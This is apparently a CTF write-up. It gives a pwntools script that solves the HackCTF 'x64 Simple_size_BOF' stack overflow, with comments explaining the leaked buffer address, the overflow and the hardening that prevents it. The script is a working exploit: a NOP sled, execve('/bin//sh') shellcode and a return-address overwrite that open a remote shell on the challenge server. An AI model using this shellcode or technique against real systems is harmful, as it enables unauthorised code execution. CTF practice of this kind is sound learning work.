Pwnable/HackCTF
x64 Simple_size_BOF
dtqdtq01
2019. 3. 30. 14:56

x64 Simple_size_BOF
from pwn import *
# Solve script for the HackCTF "x64 Simple_size_BOF" challenge service.
# Manual equivalent of the connection: nc ctf.j0n9hyun.xyz 1633
#
# What the script relies on (useful when reviewing similar code for weaknesses):
#   1. The service prints an address after the "buf: " prompt, presumably the
#      address of its own input buffer (TODO confirm against the binary). An
#      address disclosure like this removes whatever protection ASLR gave.
#   2. The service accepts far more input than its buffer holds, so the bytes
#      sent below reach the saved return address.
#   3. The overwritten return address points back into the buffer, which only
#      works if that memory is executable and no stack canary is checked --
#      presumably the case for this challenge binary; verify with a checksec run.
# Corresponding hardening: bounded reads, a non-executable stack (NX), stack
# protectors, and never echoing raw pointers to the client.
HOST = 'ctf.j0n9hyun.xyz'
PORT = 1633
LEAK_LEN = 14  # 14 characters: presumably "0x" followed by 12 hex digits

conn = remote(HOST, PORT)

# Skip the banner up to the prompt, then parse the printed address as hex.
conn.recvuntil("buf: ")
buf_addr = int(conn.recv(LEAK_LEN), 16)

# Payload layout: 27800 + 23 + 137 = 27960 bytes, then the 8-byte address.
# The saved return address therefore presumably sits 27960 bytes past the
# start of the buffer -- TODO confirm against the binary.
leading_nops = "\x90" * 27800
# 23-byte x86-64 execve("/bin//sh") shellcode, unchanged from the original post.
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
trailing_nops = "\x90" * 137

# NOTE(review): the pieces above are str objects while p64() returns bytes on
# Python 3, so this concatenation is only valid under Python 2, which is what
# the original listing appears to target.
payload = "" + leading_nops + shellcode + trailing_nops + p64(buf_addr)

conn.sendline(payload)
conn.interactive()